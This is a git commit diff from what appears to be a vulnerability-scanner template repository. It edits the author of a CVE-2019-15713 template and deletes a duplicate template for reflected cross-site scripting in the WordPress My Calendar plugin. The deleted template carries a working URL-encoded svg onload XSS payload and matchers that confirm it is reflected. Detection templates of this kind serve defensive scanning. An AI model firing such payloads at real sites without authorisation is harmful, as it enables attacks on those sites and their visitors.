duplicate update

2021-07-20 11:40:23 +05:30 · 2021-07-20 11:40:23 +05:30 · 13e5528c46
parent ac39bd3284
commit 13e5528c46
2 changed files with 1 additions and 30 deletions
--- a/cves/2019/CVE-2019-15713.yaml
+++ b/cves/2019/CVE-2019-15713.yaml
@ -2,7 +2,7 @@ id: CVE-2019-15713

 info:
  name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS)
-  author: daffainfo
+  author: daffainfo,dhiyaneshDk
  severity: medium
  description: Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site.
  reference: |
--- a/vulnerabilities/wordpress/wpmudev-my-calender-xss.yaml
+++ b/vulnerabilities/wordpress/wpmudev-my-calender-xss.yaml
@ -1,29 +0,0 @@
-id: my-calender-xss
-
-info:
-  name: My Calendar <= 3.1.9 - Unauthenticated Cross-Site Scripting (XSS)
-  author: dhiyaneshDk
-  severity: medium
-  reference: https://wpscan.com/vulnerability/9267
-  tags: wordpress
-
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm(%2F{{randstr}}%2F)%3E'
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "<svg/onload=confirm(/{{randstr}}/)>"
-        part: body
-
-      - type: word
-        part: header
-        words:
-          - text/html
-
-      - type: status
-        status:
-          - 200